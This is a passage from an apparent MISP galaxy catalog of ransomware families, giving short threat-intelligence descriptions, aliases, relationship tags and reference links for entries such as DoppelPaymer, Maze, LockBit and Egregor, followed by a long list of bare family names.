Mr. Dec ransomware is cryptovirus that was first spotted in mid-May 2018, and since then was updated multiple times. The ransomware encrypts all personal data on the device with the help of AES encryption algorithm and appends .[ID]random 16 characters[ID] file extension, preventing from their further usage.

The tag is: misp-galaxy:ransomware="Mr.Dec"

Mr.Dec is also known as:

MrDec
Sherminator

Table 5849. Table References
Links
https://www.2-spyware.com/remove-mr-dec-ransomware.html
https://id-ransomware.blogspot.com/2018/05/mrdec-ransomware.html

Freeme

Freezing crypto ransomware encrypts user data using AES, and then requires a ransom in # BTC to return the files. Original title: not indicated in the note. The file says: FreeMe.exe

The tag is: misp-galaxy:ransomware="Freeme"

Freeme is also known as:

Freezing

Table 5850. Table References
Links
http://id-ransomware.blogspot.com/2019/06/freeme-freezing-ransomware.html

DoppelPaymer

We have dubbed this new ransomware DoppelPaymer because it shares most of its code with the BitPaymer ransomware operated by INDRIK SPIDER. However, there are a number of differences between DoppelPaymer and BitPaymer, which may signify that one or more members of INDRIK SPIDER have split from the group and forked the source code of both Dridex and BitPaymer to start their own Big Game Hunting ransomware operation.

The tag is: misp-galaxy:ransomware="DoppelPaymer"

Table 5851. Table References
Links
https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/
https://malpedia.caad.fkie.fraunhofer.de/details/win.doppelpaymer

Desync

This crypto ransomware encrypts enterprise LAN data with AES (ECB mode), and then requires a ransom in # BTC to return the files.

The tag is: misp-galaxy:ransomware="Desync"

Table 5852. Table References
Links
https://id-ransomware.blogspot.com/2019/01/unnamed-desync-ransomware.html

Maze

The tag is: misp-galaxy:ransomware="Maze"

View relationships graph

Maze has relationships with:

related-to: misp-galaxy:ransomware="Ragnar Locker" with estimative-language:likelihood-probability="likely"

Table 5853. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.maze
https://www.bleepingcomputer.com/news/security/maze-ransomware-now-delivered-by-spelevo-exploit-kit/
https://www.proofpoint.com/us/threat-insight/post/ta2101-plays-government-imposter-distribute-malware-german-italian-and-us

Cyborg Ransomware

Ransomware delivered using fake Windows Update spam

The tag is: misp-galaxy:ransomware="Cyborg Ransomware"

Table 5854. Table References
Links
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/fake-windows-update-spam-leads-to-cyborg-ransomware-and-its-builder/

FTCode

A targeted email campaign has been spotted distributing the JasperLoader to victims. While the JasperLoader was originally used to then install Gootkit, Certego has observed it now being used to infect victims with a new ransomware dubbed FTCODE. Using an invoice-themed email appearing to target Italian users, the attackers attempt to convince users to allow macros in a Word document. The macro is used to run PowerShell to retrieve additional PowerShell code.

The tag is: misp-galaxy:ransomware="FTCode"

Table 5855. Table References
Links
https://www.certego.net/en/news/malware-tales-ftcode/
https://exchange.xforce.ibmcloud.com/collection/FTCODE-Ransomware-45dacdc2d5cf30722ced20b9d37988c2
https://malpedia.caad.fkie.fraunhofer.de/details/ps1.ftcode

Clop

Observed for the first time in Febuary 2019, variant from CryptoMix Family, itself a variation from CryptXXX and CryptoWall family

The tag is: misp-galaxy:ransomware="Clop"

Table 5856. Table References
Links
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf

PornBlackmailer

A new infection is being distributed by porn sites that tries to blackmail a victim into paying a ransom by stating they will tell law enforcement that the victim is spreading child porn. This is done by collecting information about the user, including screen shots of their active desktop, in order to catch them in compromising situations.

The tag is: misp-galaxy:ransomware="PornBlackmailer"

Table 5857. Table References
Links
https://www.bleepingcomputer.com/news/security/blackmailware-found-on-porn-site-threatens-to-report-users-are-spreading-child-porn/

KingOuroboros

This crypto-extortioner encrypts user data using AES, and then requires a $ 30- $ 50- $ 80 buy- back to BTC to return the files. The name is original. Written on AutoIt.

The tag is: misp-galaxy:ransomware="KingOuroboros"

Table 5858. Table References
Links
https://id-ransomware.blogspot.com/2018/06/kingouroboros-ransomware.html

MAFIA Ransomware

The ransomware appears to target users in Korea, and may have been developed with at least knowledge of the Korean language.

The tag is: misp-galaxy:ransomware="MAFIA Ransomware"

MAFIA Ransomware is also known as:

Mafia

Table 5859. Table References
Links
https://bartblaze.blogspot.com/2018/08/mafia-ransomware-targeting-users-in.html

5ss5c Ransomware

The cybercrime group that brought us Satan, DBGer and Lucky ransomware and perhaps Iron ransomware, has now come up with a new version or rebranding named 5ss5c. […] It will however only encrypt files with the following extensions: 7z, bak, cer, csv, db, dbf, dmp, docx, eps, ldf, mdb, mdf, myd, myi, ora, pdf, pem, pfx, ppt, pptx, psd, rar, rtf, sql, tar, txt, vdi, vmdk, vmx, xls, xlsx, zip

The tag is: misp-galaxy:ransomware="5ss5c Ransomware"

Table 5860. Table References
Links
https://bartblaze.blogspot.com/2020/01/satan-ransomware-rebrands-as-5ss5c.html

Nodera Ransomware

Nodera is a ransomware family that uses the Node.js framework and was discovered by Quick Heal researchers. The infection chain starts with a VBS script embedded with multiple JavaScript files. Upon execution, a directory is created and both the main node.exe program and several required NodeJS files are downloaded into the directory. Additionally, a malicious JavaScript payload that performs the encryption process is saved in this directory. After checking that it has admin privileges and setting applicable variables, the malicious JavaScript file enumerates the drives to create a list of targets. Processes associated with common user file types are stopped and volume shadow copies are deleted. Finally, all user-specific files on the C: drive and all files on other drives are encrypted and are appended with a .encrypted extension. The ransom note containing instructions on paying the Bitcoin ransom are provided along with a batch script to be used for decryption after obtaining the private key. Some mistakes in the ransom note identified by the researchers include the fact that it mentions a 2048-bit RSA public key instead of 4096-bit (the size that was actually used), a hard-coded private key destruction time dating back almost 2 years ago, and a lack of instructions for how the private key will be obtained after the ransom is paid. These are signs that the ransomware may be in the development phase and was likely written by an amateur. For more information, see the QuickHeal blog post in the Reference section below.

The tag is: misp-galaxy:ransomware="Nodera Ransomware"

Nodera Ransomware is also known as:

Nodera

Table 5861. Table References
Links
https://exchange.xforce.ibmcloud.com/collection/6f18908ce6d9cf4efb551911e00d9ec4
https://blogs.quickheal.com/first-node-js-based-ransomware-nodera/

MegaCortex

Discovered in May 2019. dropped throught networks compromised by trojan like Emotet or TrickBot. Tools and methods used are similar to LockerGoga

The tag is: misp-galaxy:ransomware="MegaCortex"

View relationships graph

MegaCortex has relationships with:

similar: misp-galaxy:ransomware="LockerGoga" with estimative-language:likelihood-probability="roughly-even-chance"

Table 5862. Table References
Links
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf

RobinHood

Detected in April 2019. Known for paralyzing the cities of Baltimore and Greenville. Probably also exfiltrate data

The tag is: misp-galaxy:ransomware="RobinHood"

RobinHood is also known as:

HelpYemen

Table 5863. Table References
Links
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf

Bart ransomware

Bart ransomware is distributed by the same Russian Cyber Mafia behind Dridex 220 and Locky. Bart doesn’t communicate with a command and control (C&C) server, so it can encrypt files without being connected to a computer. Bart is spread to end users via phishing emails containing .zip attachments with JavaScript Code and use social engineering to trick users into opening the 'photo' attachments. The zipped files are obfuscated to make it more hard to tell what actions they are performing. See screenshot above for an example of what they look like. If opened, these attachments download and install the intermediary loader RockLoader which downloads Bart onto the machine over HTTPS. Once executed, it will first check the language on the infected computer. If the malware detects Russian, Belorussian, or Ukrainian, the ransomware will terminate and will not proceed with the infection. If it’s any other language, it will start scanning the computer for certain file extensions to encrypt. Because Bart does not require communication with C&C infrastructure prior to encrypting files, Bart could possibly encrypt machines sitting behind corporate firewalls that would otherwise block such traffic. Thus, organizations need to ensure that Bart is blocked at the email gateway using rules that block zipped executables.

The tag is: misp-galaxy:ransomware="Bart ransomware"

Bart ransomware is also known as:

Locky Bart

Table 5864. Table References
Links
https://www.knowbe4.com/bart-ransomware

Razor

Razor was discovered by dnwls0719, it is a part of Garrantydecrypt ransomware family. Like many other programs of this type, Razor is designed to encrypt files (make them unusable/inaccessible), change their filenames, create a ransom note and change victim’s desktop wallpaper. Razor renames files by appending the ".razor" extension to their filenames. For example, it renames "1.jpg" to "1.jpg.razor", and so on. It creates a ransom note which is a text file named "RECOVERY.txt", this file contains instructions on how to contact Razor’s developers (cyber criminals) and other details. As stated in the "RECOVERY.txt" file, this ransomware encrypts all files and information about how to purchase a decryption tool can be received by contacting Razor’s developers. Victims supposed to contact them via razor2020@protonmail.ch, Jabber client (razor2020@jxmpp.jp) or ICQ client (@razor2020) and wait for further instructions. It is very likely that they will name a price of a decryption tool and/or key and provide cryptocurrency wallet’s address that should be used to make a transaction. However, it is never a good idea to trust (pay) any cyber criminals/ransomware developers. It is common that they do not provide decryption tools even after a payment. Another problem is that ransomware-type programs encrypt files with strong encryption algorithms and their developers are the only ones who have tools that can decrypt files encrypted by their ransomware. In most cases victims have the only free and safe option: to restore files from a backup. Also, it is worth mentioning that files remain encrypted even after uninstallation of ransomware, its removal only prevents it from causing further encryptions.

The tag is: misp-galaxy:ransomware="Razor"

Table 5865. Table References
Links
https://www.pcrisk.com/removal-guides/17016-razor-ransomware

Wadhrama

The tag is: misp-galaxy:ransomware="Wadhrama"

View relationships graph

Wadhrama has relationships with:

used-by: misp-galaxy:microsoft-activity-group="PARINACOTA" with estimative-language:likelihood-probability="likely"

Table 5866. Table References
Links
https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=ransom:win32/wadhrama.c&ThreatID=2147730655

Mespinoza

Mespinoza ransomware is used at least since october 2018. First versions used the common extension ".locked". SInce december 2019 a new version in open sourced and documented, this new version uses the ".pyza" extension.

The tag is: misp-galaxy:ransomware="Mespinoza"

Mespinoza is also known as:

Pyza
Pysa

Table 5867. Table References
Links
https://www.cert.ssi.gouv.fr/cti/CERTFR-2020-CTI-002/
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-002.pdf
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-003.pdf

CoronaVirus

A new ransomware called CoronaVirus has been distributed through a fake web site pretending to promote the system optimization software and utilities from WiseCleaner. With the increasing fears and anxiety of the Coronavirus (COVID-19) outbreak, an attacker has started to build a campaign to distribute a malware cocktail consisting of the CoronaVirus Ransomware and the Kpot information-stealing Trojan. This new ransomware was discovered by MalwareHunterTeam and after further digging into the source of the file, we have been able to determine how the threat actor plans on distributing the ransomware and possible clues suggesting that it may actually be a wiper.

The tag is: misp-galaxy:ransomware="CoronaVirus"

Table 5868. Table References
Links
https://www.bleepingcomputer.com/news/security/new-coronavirus-ransomware-acts-as-cover-for-kpot-infostealer/

Snake Ransomware

Snake ransomware first attracted the attention of malware analysts in January 2020 when they observed the crypto-malware family targeting entire corporate networks. Shortly after this discovery, the threat quieted down. It produced few new detected infections in the wild for the next few months. That was until May 4, when ID Ransomware registered a sudden spike in submissions for the ransomware.

The tag is: misp-galaxy:ransomware="Snake Ransomware"

Table 5869. Table References
Links
https://www.cybersecurity-insiders.com/meet-the-snake-ransomware-which-encrypts-all-connected-devices/
https://www.tripwire.com/state-of-security/security-data-protection/massive-spike-in-snake-ransomware-activity-attributed-to-new-campaign/
https://www.bleepingcomputer.com/news/security/large-scale-snake-ransomware-campaign-targets-healthcare-more/

eCh0raix

Anomali researchers have observed a new ransomware family, dubbed eCh0raix, targeting QNAP Network Attached Storage (NAS) devices. QNAP devices are created by the Taiwanese company QNAP Systems, Inc., and contain device storage and media player functionality, amongst others. The devices appear to be compromised by brute forcing weak credentials and exploiting known vulnerabilities in targeted attacks. The malicious payload encrypts the targeted file extensions on the NAS using AES encryption and appends .encrypt extension to the encrypted files. The ransom note created by the ransomware has the form shown below. eCh0raix was first seen in June 2019, after victims began reporting ransomware attacks in a forum topic on BleepingComputer. On June 1st, 2020, there has been a sudden surge of eCh0raix victims seeking help in our forums and submissions to the ransomware identification site ID-Ransomware.

The tag is: misp-galaxy:ransomware="eCh0raix"

Table 5870. Table References
Links
https://www.bleepingcomputer.com/news/security/ongoing-ech0raix-ransomware-campaign-targets-qnap-nas-devices/
https://www.anomali.com/blog/the-ech0raix-ransomware

Egregor

The threat group behind this malware seems to operate by hacking into companies, stealing sensitive data, and then running Egregor to encrypt all the files. According to the ransom note, if the ransom is not paid by the company within 3 days, and aside from leaking part of the stolen data, they will distribute via mass media where the company’s partners and clients will know that the company was attacked.

The tag is: misp-galaxy:ransomware="Egregor"

View relationships graph

Egregor has relationships with:

variant-of: misp-galaxy:ransomware="Sekhmet" with estimative-language:likelihood-probability="likely"

Table 5871. Table References
Links
https://www.appgate.com/news-press/appgate-labs-analyzes-new-family-of-ransomware-egregor
https://www.bleepingcomputer.com/news/security/crytek-hit-by-egregor-ransomware-ubisoft-data-leaked/
https://cybersecuritynews.com/egregor-ransomware/
https://securityboulevard.com/2020/10/egregor-sekhmets-cousin/

SunCrypt

SunCrypt ransomware was discovered in October 2019 and in August 2020 it was added to Maze ransomware’s cartel. It also follows some of Maze’s tactics, techniques, and procedures. SunCrypt is launched and installed using an obfuscated PowerShell script. Infected email attachments (macros), torrent websites, malicious ads act as carriers for this ransomware.

The tag is: misp-galaxy:ransomware="SunCrypt"

SunCrypt is also known as:

Sun
Suncrypt

Table 5872. Table References
Links
https://www.acronis.com/en-us/blog/posts/suncrypt-adopts-attacking-techniques-netwalker-and-maze-ransomware
https://www.bleepingcomputer.com/news/security/suncrypt-ransomware-sheds-light-on-the-maze-ransomware-cartel/
https://securityboulevard.com/2020/09/the-curious-case-of-suncrypt/

LockBit

LockBit operators tend to be very indiscriminate and opportunistic in their targeting. Actors behind this attack will use a variety of methods to gain initial access, up to and including basic methods such as brute force. After gaining initial access the actor follows a fairly typical escalation, lateral movement and ransomware execution playbook. LockBit operators tend to have a very brief dwell time, executing the final ransomware payload as quickly as they are able to. LockBit ransomware has the built-in lateral movement features; given adequate permissions throughout the targeted environment.

The tag is: misp-galaxy:ransomware="LockBit"

Table 5873. Table References
Links
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/tales-from-the-trenches-a-lockbit-ransomware-story/
https://usa.kaspersky.com/resource-center/threats/lockbit-ransomware

WastedLocker

WastedLocker primarily targets corporate networks. Upon initial compromise, often using a fake browser update containing SocGholish, the actor then takes advantage of dual-use and LoLBin tools in an attempt to evade detection. Key observations include lateral movement and privilege escalation. The WastedLocker ransomware has been tied back to EvilCorp.

The tag is: misp-galaxy:ransomware="WastedLocker"

Table 5874. Table References
Links
https://blogs.cisco.com/security/talos/wastedlocker-goes-big-game-hunting-in-2020
https://blog.malwarebytes.com/threat-spotlight/2020/07/threat-spotlight-wastedlocker-customized-ransomware/
https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/

Babuk Ranomsware

Since this is the first detection of this malware in the wild, it’s not surprising that Babuk is not obsfuscated at all. Overall, it’s a pretty standard ransomware that utilizes some of the new techniques we see such as multi-threading encryption as well as abusing the Windows Restart Manager similar to Conti and REvil. For encrypting scheme, Babuk uses its own implementation of SHA256 hashing, ChaCha8 encryption, and Elliptic-curve Diffie–Hellman (ECDH) key generation and exchange algorithm to protect its keys and encrypt files. Like many ransomware that came before, it also has the ability to spread its encryption through enumerating the available network resources.

The tag is: misp-galaxy:ransomware="Babuk Ranomsware"

Table 5875. Table References
Links
http://chuongdong.com//reverse%20engineering/2021/01/03/BabukRansomware/

Darkside

Darkside, the latest ransomware operation to emerge has been attacking organizations beginning earlier this month. Darkside’s customized attacks on companies have already garnered them million-dollar payouts. Through their “press release”, these threat actors have claimed to be affiliated with prior ransomware operations making millions of dollars. They stated that they created this new product to match their needs, as prior products didn’t. Darkside explains that they only target companies they know that can pay the specified ransom. They have allegedly promised that they will not attack the following sectors. They include medicine, education, non-profit organizations, and the government sector.

The tag is: misp-galaxy:ransomware="Darkside"

Table 5876. Table References
Links
https://www.digitalshadows.com/blog-and-research/darkside-the-new-ransomware-group-behind-highly-targeted-attacks/
https://www.wired.com/story/ransomware-gone-corporate-darkside-where-will-it-end/
https://darksidedxcftmqa.onion.foundation/

RansomEXX

We recently discovered a new file-encrypting Trojan built as an ELF executable and intended to encrypt data on machines controlled by Linux-based operating systems. After the initial analysis we noticed similarities in the code of the Trojan, the text of the ransom notes and the general approach to extortion, which suggested that we had in fact encountered a Linux build of the previously known ransomware family RansomEXX. This malware is notorious for attacking large organizations and was most active earlier this year. RansomEXX is a highly targeted Trojan. Each sample of the malware contains a hardcoded name of the victim organization. Moreover, both the encrypted file extension and the email address for contacting the extortionists make use of the victim’s name.

The tag is: misp-galaxy:ransomware="RansomEXX"

RansomEXX is also known as:

Ransom X
Defray777
Defray-777
Defray 2018

Table 5877. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomexx
https://id-ransomware.blogspot.com/2020/06/ransomexx-ransomware.html
https://github.com/Bleeping/Ransom.exx
https://www.bleepingcomputer.com/news/security/new-ransom-x-ransomware-used-in-texas-txdot-cyberattack/
https://www.bleepingcomputer.com/news/security/brazils-court-system-under-massive-ransomexx-ransomware-attack/
https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4/
https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/

CovidLock

Mobile ransomware. The Zscaler ThreatLabZ team recently came across a URL named hxxp://coronavirusapp[.]site/mobile.html, which portrays itself as a download site for an Android app that tracks the coronavirus spread across the globe. In reality, the app is Android ransomware, which locks out the victim and asks for ransom to unlock the device. The app portrays itself as a Coronavirus Tracker. As soon as it starts running, it asks the user for several authorizations, including admin rights. In fact, this ransomware does not encrypt nor steal anything and only lock the device with an hard coded code.

The tag is: misp-galaxy:ransomware="CovidLock"

Table 5878. Table References
Links
https://www.zscaler.com/blogs/security-research/covidlock-android-ransomware-walkthrough-and-unlocking-routine

Tycoon

This malware is written in Java and is named after references in the code. Tycoon has been in the wild since December 2019 and has targeted organizations in the education, SMBs, and software industries. Tycoon is a multi-platform Java ransomware that targets Windows and Linux systems. This ransomware denies access to the system administrator following an attack on the domain controller and file servers. The initial intrusion occurs through an internet-facing remote desktop protocol (RDP) jump-server.

The tag is: misp-galaxy:ransomware="Tycoon"

Table 5879. Table References
Links
https://cyberflorida.org/threat-advisory/tycoon-ransomware/
https://usf.app.box.com/s/83xh0t5w99klrsoisorir7kgs14o972s

Ragnar Locker

Ragnar Locker is a ransomware identified in December 2019 that targetscorporate networks inBig Game Huntingtargeted attacks. This reportpresents recent elements regarding this ransomware.

The tag is: misp-galaxy:ransomware="Ragnar Locker"

Ragnar Locker is also known as:

RagnarLocker

View relationships graph

Ragnar Locker has relationships with:

similar: misp-galaxy:mitre-malware="Ragnar Locker - S0481" with estimative-language:likelihood-probability="likely"

Table 5880. Table References
Links
https://www.bleepingcomputer.com/news/security/ragnar-locker-ransomware-targets-msp-enterprise-support-tools/
https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/
https://www.cybersecurity-insiders.com/ransomware-attack-makes-cwt-pay-4-5-million-in-bitcoins-to-hackers/

Sekhmet

Ransom.Sekhmet not only encrypts a victims files, but also threatens to publish them.

The tag is: misp-galaxy:ransomware="Sekhmet"

View relationships graph

Sekhmet has relationships with:

similar: misp-galaxy:ransomware="Egregor" with estimative-language:likelihood-probability="likely"

Table 5881. Table References
Links
https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/
https://www.zdnet.com/article/as-maze-ransomware-group-retires-clients-turn-to-sekhmet-ransomware-spin-off-egregor/
https://blog.malwarebytes.com/detections/ransom-sekhmet/
https://securityboulevard.com/2020/10/egregor-sekhmets-cousin/

$$$

Ransomware

The tag is: misp-galaxy:ransomware="$$$"

$ucyLocker

Ransomware

The tag is: misp-galaxy:ransomware="$ucyLocker"

10001

Ransomware

The tag is: misp-galaxy:ransomware="10001"

05250lock

Ransomware

The tag is: misp-galaxy:ransomware="05250lock"

0kilobypt

Ransomware

The tag is: misp-galaxy:ransomware="0kilobypt"

1337-Locker

Ransomware

The tag is: misp-galaxy:ransomware="1337-Locker"

24H

Ransomware

The tag is: misp-galaxy:ransomware="24H"

3nCRY

Ransomware

The tag is: misp-galaxy:ransomware="3nCRY"

4rw5w

Ransomware

The tag is: misp-galaxy:ransomware="4rw5w"

5ss5c(5ss5cCrypt)

Ransomware

The tag is: misp-galaxy:ransomware="5ss5c(5ss5cCrypt)"

777(Legion)

Ransomware

The tag is: misp-galaxy:ransomware="777(Legion)"

7h9r

Ransomware

The tag is: misp-galaxy:ransomware="7h9r"

7z Portuguese

Ransomware

The tag is: misp-galaxy:ransomware="7z Portuguese"

AAC

Ransomware

The tag is: misp-galaxy:ransomware="AAC"

ABCLocker

Ransomware

The tag is: misp-galaxy:ransomware="ABCLocker"

Adonis

Ransomware

The tag is: misp-galaxy:ransomware="Adonis"

AepCrypt

Ransomware

The tag is: misp-galaxy:ransomware="AepCrypt"

AES-Matrix

Ransomware

The tag is: misp-galaxy:ransomware="AES-Matrix"

AES-NI: April Edition

Ransomware

The tag is: misp-galaxy:ransomware="AES-NI: April Edition"

Afrodita

Ransomware

The tag is: misp-galaxy:ransomware="Afrodita"

Alco

Ransomware

The tag is: misp-galaxy:ransomware="Alco"

AllCry

Ransomware

The tag is: misp-galaxy:ransomware="AllCry"

AlldataLocker

Ransomware

The tag is: misp-galaxy:ransomware="AlldataLocker"

Amnesia

Ransomware

The tag is: misp-galaxy:ransomware="Amnesia"

Amnesia-2

Ransomware

The tag is: misp-galaxy:ransomware="Amnesia-2"

Anatova

Ransomware

The tag is: misp-galaxy:ransomware="Anatova"

AnDROid

Ransomware

The tag is: misp-galaxy:ransomware="AnDROid"

AngryKite

Ransomware

The tag is: misp-galaxy:ransomware="AngryKite"

AnimusLocker

Ransomware

The tag is: misp-galaxy:ransomware="AnimusLocker"

Annabelle

Ransomware

The tag is: misp-galaxy:ransomware="Annabelle"

Annabelle 2.1

Ransomware

The tag is: misp-galaxy:ransomware="Annabelle 2.1"

AnonCrack

Ransomware

The tag is: misp-galaxy:ransomware="AnonCrack"

AnonPop

Ransomware

The tag is: misp-galaxy:ransomware="AnonPop"

AnteFrigus

Ransomware

The tag is: misp-galaxy:ransomware="AnteFrigus"

Anti-DDos

Ransomware

The tag is: misp-galaxy:ransomware="Anti-DDos"

Antihacker2017

Ransomware

The tag is: misp-galaxy:ransomware="Antihacker2017"

Anubi NotBTCWare

Ransomware

The tag is: misp-galaxy:ransomware="Anubi NotBTCWare"

Apocalypse-Missing

Ransomware

The tag is: misp-galaxy:ransomware="Apocalypse-Missing"

ApolloLocker

Ransomware

The tag is: misp-galaxy:ransomware="ApolloLocker"

Argus

Ransomware

The tag is: misp-galaxy:ransomware="Argus"

Armage

Ransomware

The tag is: misp-galaxy:ransomware="Armage"

Armageddon

Ransomware

The tag is: misp-galaxy:ransomware="Armageddon"

ArmaLocky

Ransomware

The tag is: misp-galaxy:ransomware="ArmaLocky"

Arsium

Ransomware

The tag is: misp-galaxy:ransomware="Arsium"

Assembly

Ransomware

The tag is: misp-galaxy:ransomware="Assembly"

Ataware

Ransomware

The tag is: misp-galaxy:ransomware="Ataware"

Atchbo

Ransomware

The tag is: misp-galaxy:ransomware="Atchbo"

ATLAS

Ransomware

The tag is: misp-galaxy:ransomware="ATLAS"

Australian-AES

Ransomware

The tag is: misp-galaxy:ransomware="Australian-AES"

AutoEncryptor

Ransomware

The tag is: misp-galaxy:ransomware="AutoEncryptor"

AutoWannaCryV2

Ransomware

The tag is: misp-galaxy:ransomware="AutoWannaCryV2"

Auuahk-Ouuohk

Ransomware

The tag is: misp-galaxy:ransomware="Auuahk-Ouuohk"

AVCrypt

Ransomware

The tag is: misp-galaxy:ransomware="AVCrypt"

AxCrypter

Ransomware

The tag is: misp-galaxy:ransomware="AxCrypter"

aZaZeL

Ransomware

The tag is: misp-galaxy:ransomware="aZaZeL"

BadEncript

Ransomware

The tag is: misp-galaxy:ransomware="BadEncript"

Balbaz

Ransomware

The tag is: misp-galaxy:ransomware="Balbaz"

Baliluware

Ransomware

The tag is: misp-galaxy:ransomware="Baliluware"

Bam!

Ransomware

The tag is: misp-galaxy:ransomware="Bam!"

BananaCrypt

Ransomware

The tag is: misp-galaxy:ransomware="BananaCrypt"

BancoCrypt HT

Ransomware

The tag is: misp-galaxy:ransomware="BancoCrypt HT"

Barack Obama’s EBBV

Ransomware

The tag is: misp-galaxy:ransomware="Barack Obama’s EBBV"

Basilisque Locker

Ransomware

The tag is: misp-galaxy:ransomware="Basilisque Locker"

BASS-FES

Ransomware

The tag is: misp-galaxy:ransomware="BASS-FES"

BB

Ransomware

The tag is: misp-galaxy:ransomware="BB"

BeethoveN

Ransomware

The tag is: misp-galaxy:ransomware="BeethoveN"

BestChangeRu

Ransomware

The tag is: misp-galaxy:ransomware="BestChangeRu"

BigBossHorse

Ransomware

The tag is: misp-galaxy:ransomware="BigBossHorse"

Birbware

Ransomware

The tag is: misp-galaxy:ransomware="Birbware"

BitCrypt

Ransomware

The tag is: misp-galaxy:ransomware="BitCrypt"

BitCrypt 2.0

Ransomware

The tag is: misp-galaxy:ransomware="BitCrypt 2.0"

BitKangoroo

Ransomware

The tag is: misp-galaxy:ransomware="BitKangoroo"

BitPyLock

Ransomware

The tag is: misp-galaxy:ransomware="BitPyLock"

Bitshifter

Ransomware

The tag is: misp-galaxy:ransomware="Bitshifter"

BKRansomware

Ransomware

The tag is: misp-galaxy:ransomware="BKRansomware"

Black Feather

Ransomware

The tag is: misp-galaxy:ransomware="Black Feather"

BlackFireEye

Ransomware

The tag is: misp-galaxy:ransomware="BlackFireEye"

BlackHat-Mehtihack

Ransomware

The tag is: misp-galaxy:ransomware="BlackHat-Mehtihack"

BlackKingdom

Ransomware

The tag is: misp-galaxy:ransomware="BlackKingdom"

BlackMist

Ransomware

The tag is: misp-galaxy:ransomware="BlackMist"

Blackout

Ransomware

The tag is: misp-galaxy:ransomware="Blackout"

BlackPink

Ransomware

The tag is: misp-galaxy:ransomware="BlackPink"

BlackRose

Ransomware

The tag is: misp-galaxy:ransomware="BlackRose"

BlackSheep

Ransomware

The tag is: misp-galaxy:ransomware="BlackSheep"

Black Worm

Ransomware

The tag is: misp-galaxy:ransomware="Black Worm"

Blank

Ransomware

The tag is: misp-galaxy:ransomware="Blank"

Blind

Ransomware

The tag is: misp-galaxy:ransomware="Blind"

Blitzkrieg

Ransomware

The tag is: misp-galaxy:ransomware="Blitzkrieg"

BlockFile12

Ransomware

The tag is: misp-galaxy:ransomware="BlockFile12"

BloodJaws

Ransomware

The tag is: misp-galaxy:ransomware="BloodJaws"

Blooper

Ransomware

The tag is: misp-galaxy:ransomware="Blooper"

BlueCheeser

Ransomware

The tag is: misp-galaxy:ransomware="BlueCheeser"

Bluerose

Ransomware

The tag is: misp-galaxy:ransomware="Bluerose"

BOK

Ransomware

The tag is: misp-galaxy:ransomware="BOK"

BoooamCrypt

Ransomware

The tag is: misp-galaxy:ransomware="BoooamCrypt"

BooM

Ransomware

The tag is: misp-galaxy:ransomware="BooM"

Boris HT

Ransomware

The tag is: misp-galaxy:ransomware="Boris HT"

BrainLag

Ransomware

The tag is: misp-galaxy:ransomware="BrainLag"

BRansomware

Ransomware

The tag is: misp-galaxy:ransomware="BRansomware"

Brick

Ransomware

The tag is: misp-galaxy:ransomware="Brick"

BrickR

Ransomware

The tag is: misp-galaxy:ransomware="BrickR"

BtcKING

Ransomware

The tag is: misp-galaxy:ransomware="BtcKING"

BTCWare-Aleta

Ransomware

The tag is: misp-galaxy:ransomware="BTCWare-Aleta"

BTCWare-Gryphon

Ransomware

The tag is: misp-galaxy:ransomware="BTCWare-Gryphon"

BTCWare-Master

Ransomware

The tag is: misp-galaxy:ransomware="BTCWare-Master"

BTCWare-Nuclear

Ransomware

The tag is: misp-galaxy:ransomware="BTCWare-Nuclear"

BTCWare-Onyon

Ransomware

The tag is: misp-galaxy:ransomware="BTCWare-Onyon"

BTCWare-PayDay

Ransomware

The tag is: misp-galaxy:ransomware="BTCWare-PayDay"

BTCWare-Wyvern

Ransomware

The tag is: misp-galaxy:ransomware="BTCWare-Wyvern"

Bud

Ransomware

The tag is: misp-galaxy:ransomware="Bud"

BugWare

Ransomware

The tag is: misp-galaxy:ransomware="BugWare"

BulbaCrypt HT

Ransomware

The tag is: misp-galaxy:ransomware="BulbaCrypt HT"

BWall

Ransomware

The tag is: misp-galaxy:ransomware="BWall"

C0hen Locker

Ransomware

The tag is: misp-galaxy:ransomware="C0hen Locker"

CA$HOUT

Ransomware

The tag is: misp-galaxy:ransomware="CA$HOUT"

CainXPii

Ransomware

The tag is: misp-galaxy:ransomware="CainXPii"

Cephalo

Ransomware

The tag is: misp-galaxy:ransomware="Cephalo"

Cerberos

Ransomware

The tag is: misp-galaxy:ransomware="Cerberos"

Charmant

Ransomware

The tag is: misp-galaxy:ransomware="Charmant"

Chekyshka

Ransomware

The tag is: misp-galaxy:ransomware="Chekyshka"

ChernoLocker

Ransomware

The tag is: misp-galaxy:ransomware="ChernoLocker"

ChinaYunLong

Ransomware

The tag is: misp-galaxy:ransomware="ChinaYunLong"

Christmas

Ransomware

The tag is: misp-galaxy:ransomware="Christmas"

ClicoCrypter

Ransomware

The tag is: misp-galaxy:ransomware="ClicoCrypter"

ClicoCrypter-2

Ransomware

The tag is: misp-galaxy:ransomware="ClicoCrypter-2"

Clouded

Ransomware

The tag is: misp-galaxy:ransomware="Clouded"

Cmd

Ransomware

The tag is: misp-galaxy:ransomware="Cmd"

Codemanager

Ransomware

The tag is: misp-galaxy:ransomware="Codemanager"

Coin Locker

Ransomware

The tag is: misp-galaxy:ransomware="Coin Locker"

Comrade HT

Ransomware

The tag is: misp-galaxy:ransomware="Comrade HT"

CoNFicker

Ransomware

The tag is: misp-galaxy:ransomware="CoNFicker"

Coom

Ransomware

The tag is: misp-galaxy:ransomware="Coom"

CorruptCrypt

Ransomware

